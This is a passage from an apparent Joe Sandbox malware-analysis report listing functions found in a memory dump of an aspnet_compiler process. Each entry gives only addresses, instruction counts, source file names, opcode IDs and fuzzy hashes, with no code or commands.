                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 079d61e2bc7721abdb0714a4c4778cfdb2a441d41dd6c14830fe72fa7c8fa295
                                                                                                        • Instruction ID: 18ff6fde0dac8d234b0d6d0a8355aa71465e0754a71a761ddb049ab3999e890c
                                                                                                        • Opcode Fuzzy Hash: 079d61e2bc7721abdb0714a4c4778cfdb2a441d41dd6c14830fe72fa7c8fa295
                                                                                                        • Instruction Fuzzy Hash: C671F633140701AFE732DF18C884F56BBAAEF44724F25481CE296D72A5EBB5EA44CB50
                                                                                                        Function 0184132D Relevance: .2, Instructions: 188COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b3133c3534113725db2a93ccdf26ba1b5c1e0291fea10cba132e8db76db5ee2b
                                                                                                        • Instruction ID: e86ff8849be98ec0d86a1fb99176090b5f0a0bc469c236b149e34b37ea8946cb
                                                                                                        • Opcode Fuzzy Hash: b3133c3534113725db2a93ccdf26ba1b5c1e0291fea10cba132e8db76db5ee2b
                                                                                                        • Instruction Fuzzy Hash: 55818275A00609DFCB09CF68C494AAEBBF1FF48310F158169D859EB355DB34EA41CB90
                                                                                                        Function 0184903E Relevance: .2, Instructions: 186COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 84d153d9a12ccd10922aa883b82e44e02995011cf38fe1309f97f873e2c6dc6d
                                                                                                        • Instruction ID: 2162b91ab873965ccf9a7cbd2b506fbf92a858fc071d303d6d136b0ab90cf701
                                                                                                        • Opcode Fuzzy Hash: 84d153d9a12ccd10922aa883b82e44e02995011cf38fe1309f97f873e2c6dc6d
                                                                                                        • Instruction Fuzzy Hash: E461917160061AAFD725DF68C884BABBBA9FF88718F004619F969C7240DF34E615CB91
                                                                                                        Function 018492A6 Relevance: .2, Instructions: 174COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bf1f81a6fb96e6f64936f1bbd33193df8cb2eb67fdee892cc8ee822b7c602d23
                                                                                                        • Instruction ID: 2b2569800614141e811070811117ebde659a0bf3f587bd14dfc5271c506a2c27
                                                                                                        • Opcode Fuzzy Hash: bf1f81a6fb96e6f64936f1bbd33193df8cb2eb67fdee892cc8ee822b7c602d23
                                                                                                        • Instruction Fuzzy Hash: 21610431A0474A8BE321CF68C494B6BBBE0BF9971CF18446DE995CB281DF35EA05C781
                                                                                                        Function 0177B2D3 Relevance: .2, Instructions: 161COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8e596ee73472315154694e7b81c11df206b3761ed919a628362ad09be5ef9f60
                                                                                                        • Instruction ID: 3d85c8df4976d12d58cb30636f48d70d39d55c40604156467a4b5794deaef68b
                                                                                                        • Opcode Fuzzy Hash: 8e596ee73472315154694e7b81c11df206b3761ed919a628362ad09be5ef9f60
                                                                                                        • Instruction Fuzzy Hash: 93415431640601AFDF26AF29D884B6AFBB5FF44724F11846AEA19DB295DB30DC40CB90
                                                                                                        Function 017BB570 Relevance: .2, Instructions: 161COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3cfb85b9ac63d7a7fdc076c8da1d861d39e92b8ddfa8c87fb25e3fba812ae8ce
                                                                                                        • Instruction ID: 3bee147f7c87a5d40e956b36a26da8fd43ca259db646441b837bf30d13e69c95
                                                                                                        • Opcode Fuzzy Hash: 3cfb85b9ac63d7a7fdc076c8da1d861d39e92b8ddfa8c87fb25e3fba812ae8ce
                                                                                                        • Instruction Fuzzy Hash: 6851C671204642AFE734EF64CC89F6BB7A8EF95724F10062DFA1197295DB30D941CBA1
                                                                                                        Function 017A95DA Relevance: .2, Instructions: 160COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8d9121f95e0eb06737e90e0ecfbd86a47a24d208d59cdb3986a96458d952b9c4
                                                                                                        • Instruction ID: bf3b3617e2edc1dddf1356b42a5e36d6aadf63aca77c0cecd81c7e0076ff4ad1
                                                                                                        • Opcode Fuzzy Hash: 8d9121f95e0eb06737e90e0ecfbd86a47a24d208d59cdb3986a96458d952b9c4
                                                                                                        • Instruction Fuzzy Hash: 09518D70900209AEEB219FA5C885BEDFBF4FF45344F60412EE694AB192DB719864DF10
                                                                                                        Function 01787152 Relevance: .2, Instructions: 158COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 64e8eba9e0eccb8f851fc53e0ece761b2d172417573a289f72cbc0c2eeb523ea
                                                                                                        • Instruction ID: 19a52510bd8b33dcb7887515dd08e6818a37c8543ad9079b7eeb8a90af05d218
                                                                                                        • Opcode Fuzzy Hash: 64e8eba9e0eccb8f851fc53e0ece761b2d172417573a289f72cbc0c2eeb523ea
                                                                                                        • Instruction Fuzzy Hash: 2D510531E44606EFEB19EB68C848BADFBF5FF98715F204069E41393690DB749911CB90
                                                                                                        Function 017BE443 Relevance: .2, Instructions: 158COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 39cfea316ab3bdfd11bdbbaf56648dd0c83f4d2bb02a4f4ac3c898161010de29
                                                                                                        • Instruction ID: 3f34f744a7c3b10de6ba2a6e8a9ab7c1b9e22c391700051841c8b51cd378dcad
                                                                                                        • Opcode Fuzzy Hash: 39cfea316ab3bdfd11bdbbaf56648dd0c83f4d2bb02a4f4ac3c898161010de29
                                                                                                        • Instruction Fuzzy Hash: AF516971200A459FCB22EF69D9C4FAAF3B9FF14784F40086DE65687260EB34E944CB60
                                                                                                        Function 017A45B1 Relevance: .2, Instructions: 156COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                        • Instruction ID: 249c61f2033207a37c23c15a9276b30418519e3cfff8564b09a2aca9375e5f9d
                                                                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                        • Instruction Fuzzy Hash: 7351AF75E0024AABDF15DF98C444BEEFFB5AF88310F484269EA02AB240D775DD44CBA0
                                                                                                        Function 0184D26B Relevance: .2, Instructions: 153COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                        • Instruction ID: cbe74ee69f71e7342f7b0358bebdfe65f7493c3368b8b091ab1d947ba53640a5
                                                                                                        • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                        • Instruction Fuzzy Hash: 41518E7160834A9FD311CF68C884B5ABBE5FBD8354F048A2DF994C7280DB34EA45CB92
                                                                                                        Function 017851ED Relevance: .1, Instructions: 149COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0a5d2e0b50bcb8279af24e790388d3d35275b99fd1daadab3e34f2c4ea4a6eef
                                                                                                        • Instruction ID: c954b26c2a68683de3754d52402e959e01152aaf8ca15f5ecd4b3ddf85ee4d3b
                                                                                                        • Opcode Fuzzy Hash: 0a5d2e0b50bcb8279af24e790388d3d35275b99fd1daadab3e34f2c4ea4a6eef
                                                                                                        • Instruction Fuzzy Hash: FC519D71B85615DFEF22EBA8C848BEDF7F4BB18718F140058E801E7242D7B499408B51
                                                                                                        Function 018535D7 Relevance: .1, Instructions: 139COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                        • Instruction ID: 7520da75d5581442e3022c08554f8faccb4bb675c4cba91d131e16fc6ee2da19
                                                                                                        • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                        • Instruction Fuzzy Hash: 67515A7160060AEFCB56CF58C580A56FBF5FF45348B1581AAED08DF226E371EA45CBA0
                                                                                                        Function 017BA430 Relevance: .1, Instructions: 139COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 94a0193654e4c84c7b80c535189848f865e98d24ad1e10551ecf87b11bac7e6f
                                                                                                        • Instruction ID: 3666552ce9c09b4873cbdf30a3434318df5692368d63105226d4fac7944edbc7
                                                                                                        • Opcode Fuzzy Hash: 94a0193654e4c84c7b80c535189848f865e98d24ad1e10551ecf87b11bac7e6f
                                                                                                        • Instruction Fuzzy Hash: 3A412671A502029BDB25FF69A8C9BAAF774EB58718F00006CFE169B355DB71DE008B50
                                                                                                        Function 017B01F8 Relevance: .1, Instructions: 138COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 302b8432d20161d102392eee6ca18a7a7a4aafbd65a256f47764cfce6dcf7918
                                                                                                        • Instruction ID: de0ce4dfcdc65aeb7d6c3e10d7eb535e750f92a34e7a081a4db0c61f4c08335e
                                                                                                        • Opcode Fuzzy Hash: 302b8432d20161d102392eee6ca18a7a7a4aafbd65a256f47764cfce6dcf7918
                                                                                                        • Instruction Fuzzy Hash: 43419736A012199BDB14DF98C480BEFFBB5AF48614F1481AEF919EB340E7349945CBA4
                                                                                                        Function 0178D534 Relevance: .1, Instructions: 138COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cae74165526ed39fbae550a9a2b7666cb338a361826ccd151614af120e9d5b24
                                                                                                        • Instruction ID: bcb4c373a63bd8e126d0d0a2d5d69698b115892bb97d63792eb2abe637006bb9
                                                                                                        • Opcode Fuzzy Hash: cae74165526ed39fbae550a9a2b7666cb338a361826ccd151614af120e9d5b24
                                                                                                        • Instruction Fuzzy Hash: 2951BB322446918FD732DB5CC448F6AF7E5BB48754F0904A6F951CB691DB38DC40CAA1
                                                                                                        Function 01786154 Relevance: .1, Instructions: 133COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3b826520c07917060bc02fc8c17a4bf0d53dece9227b9d50b6a1b6d4db22b023
                                                                                                        • Instruction ID: 6735222b8ae5312d962d8a7dd262a5f72f0de27f87d80c9b53d849210e7fb87d
                                                                                                        • Opcode Fuzzy Hash: 3b826520c07917060bc02fc8c17a4bf0d53dece9227b9d50b6a1b6d4db22b023
                                                                                                        • Instruction Fuzzy Hash: B2510770A44606EBDB25EB28CC08BE8FBF1EF15314F1482E9E529972D6E7749981CF40
                                                                                                        Function 0177B136 Relevance: .1, Instructions: 131COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b3232a8b0a0c0b93c7a11fd244ca23977d7b5144ca4f771a362d218d4f6cbe88
                                                                                                        • Instruction ID: bcd85df5ba64f9541280afa15b2ade27c94a4e8fe929d18b5469b050c1618cff
                                                                                                        • Opcode Fuzzy Hash: b3232a8b0a0c0b93c7a11fd244ca23977d7b5144ca4f771a362d218d4f6cbe88
                                                                                                        • Instruction Fuzzy Hash: 6B41CFB1641606EFDB22AF68D888B6AFBF8EF14794F008469E515DB295E770D840CF50
                                                                                                        Function 017AA470 Relevance: .1, Instructions: 127COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ee5ed681b8ebcaee400dcabdfa08c208ce9b76ea9ee71ce010c333638d0ba6b4
                                                                                                        • Instruction ID: 72672ecd062b286bbacddc14543b6db4e1eb20d60a139d6c5b146d3b6cbeecae
                                                                                                        • Opcode Fuzzy Hash: ee5ed681b8ebcaee400dcabdfa08c208ce9b76ea9ee71ce010c333638d0ba6b4
                                                                                                        • Instruction Fuzzy Hash: 8D419C32944205CFDB25DF6CD8987A9FBB0BB98350F640699D411BB295DB34DA40CFA4
                                                                                                        Function 0177A020 Relevance: .1, Instructions: 122COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                        • Instruction ID: fe057336e5003a2769d719683e9445fb6f40294e3800fba2a0ed52bfa83febef
                                                                                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                        • Instruction Fuzzy Hash: DA414A31A00319DBFF22DE298444BBEFB71EB51754F1A84EAE9458B244E7338D80CB90
                                                                                                        Function 018005A7 Relevance: .1, Instructions: 111COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4e231a5422b826e2e6640b573b17524af4df17ba1aff2ab2e95b793bd44e3458
                                                                                                        • Instruction ID: 6dcd030e2c23e558ea6921effd6322a82c5c96ff8b3718c5f1a7b2e92e2b6abb
                                                                                                        • Opcode Fuzzy Hash: 4e231a5422b826e2e6640b573b17524af4df17ba1aff2ab2e95b793bd44e3458
                                                                                                        • Instruction Fuzzy Hash: 9041A17250874A9BD321DF68DC40B6AB7A5BF88740F14462DF954D7680E730DA04C7A6
                                                                                                        Function 017902E1 Relevance: .1, Instructions: 106COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                        • Instruction ID: 71f163d70cb130a59f43786353f1396321ee6518c43538a19ceca6f56cacf6cb
                                                                                                        • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                        • Instruction Fuzzy Hash: 7C312332A10244AFDF229B78CC48B9FFBE8AF15350F0441AAF815D7356C7749888CBA0
                                                                                                        Function 017A9274 Relevance: .1, Instructions: 105COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9c6391692eb645019313f49839d3ec0aa0cb7ab3fdc32cbd9027c8208f34c377
                                                                                                        • Instruction ID: a829b041d577f2b1f9b30cfc239c4b115f982ffbe34556419fe1d0d1e6de8e44
                                                                                                        • Opcode Fuzzy Hash: 9c6391692eb645019313f49839d3ec0aa0cb7ab3fdc32cbd9027c8208f34c377
                                                                                                        • Instruction Fuzzy Hash: 9731B375A00229AFDB31CB68CC44B9AFBB5EF86714F4502D9A64CA7280DB30DE84CF51
                                                                                                        Function 01784260 Relevance: .1, Instructions: 102COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1acd2e317133e95167ae2d2adab447dc3d5f24d77266da7b16ebd02b92df2874
                                                                                                        • Instruction ID: 279c6cc206da94338bcd021e2fb9854b6df12da7ce676c8503e380de78e4aa60
                                                                                                        • Opcode Fuzzy Hash: 1acd2e317133e95167ae2d2adab447dc3d5f24d77266da7b16ebd02b92df2874
                                                                                                        • Instruction Fuzzy Hash: 5841C071244B46DFD722DF28C488BD6FBE8BF49714F00442DEA5A8B250D7B4E804CB60
                                                                                                        Function 017A50E4 Relevance: .1, Instructions: 101COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                        • Instruction ID: d0c644198d7a65dddcd3968ed2af8dd518236f48a232f7dc89e7ba5d6b4d6e8a
                                                                                                        • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                        • Instruction Fuzzy Hash: F331E6316083429BEB21DA2CC804777FBD5ABC9750F89876AF585CB395D274DC41C792
                                                                                                        Function 0177B480 Relevance: .1, Instructions: 100COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 52d0cce3379df67ff8a4c00ee425c1dbb14e71a3f3884cc5b231e82a6dd045e0
                                                                                                        • Instruction ID: 532e677e902d3c17e1337b029830666427cb20bd42d215892ae3b1948f174586
                                                                                                        • Opcode Fuzzy Hash: 52d0cce3379df67ff8a4c00ee425c1dbb14e71a3f3884cc5b231e82a6dd045e0
                                                                                                        • Instruction Fuzzy Hash: 1F312172600604AFCB21EF18D880A66BBA5FF85364F244669ED458B292D731ED46CBE0
                                                                                                        Function 018461C3 Relevance: .1, Instructions: 97COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e5baa402a38d87b00329ff89886d8ab6443b0d0dd08ede9635cfb6b837f2a7ea
                                                                                                        • Instruction ID: 9200e11761bd0d853ebc05e42d2625bec5fefcf9fbe3c7a9a65dd1880af51ecb
                                                                                                        • Opcode Fuzzy Hash: e5baa402a38d87b00329ff89886d8ab6443b0d0dd08ede9635cfb6b837f2a7ea
                                                                                                        • Instruction Fuzzy Hash: 4A31D275A0012ABBDB15DF98CC44BAEB7B5FB45B40F554168E900EB244EB70EE40CB90
                                                                                                        Function 018460B8 Relevance: .1, Instructions: 95COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3feb826c68ea9112465fba4de372b6dd5350a86babe0bafa886070852a3760f0
                                                                                                        • Instruction ID: 140a3ec6a8ca0f287b00601a0e714d406511b6e7dc78559d9470bec0c66ed944
                                                                                                        • Opcode Fuzzy Hash: 3feb826c68ea9112465fba4de372b6dd5350a86babe0bafa886070852a3760f0
                                                                                                        • Instruction Fuzzy Hash: 5B31F971700A1AEFDB129F5DC890B6EB7B9AF55754F20406DE509EB342EE30DE008B90
                                                                                                        Function 01788550 Relevance: .1, Instructions: 94COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 202bbf50b524792b6a6a0dc49cde574b617617469b65880a7174eaf516c7bd55
                                                                                                        • Instruction ID: ba17261be351faaaf0d5431e2106c3b486a0b06ca5ac68c5e5142df28eb6b424
                                                                                                        • Opcode Fuzzy Hash: 202bbf50b524792b6a6a0dc49cde574b617617469b65880a7174eaf516c7bd55
                                                                                                        • Instruction Fuzzy Hash: E1318C726093018FE760DF19C844B2AFBE9FF98700F55496DE9849B392D770E944CBA2
                                                                                                        Function 017A438F Relevance: .1, Instructions: 89COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0d636d907e1842cde3c8614711c17b8334d9039cc6d41882c0c3bfca4fd857e2
                                                                                                        • Instruction ID: 6bcab2f8f6a2140d7e1cd58bc97416f64ac97b24d9c9489622f081113b9f8a8f
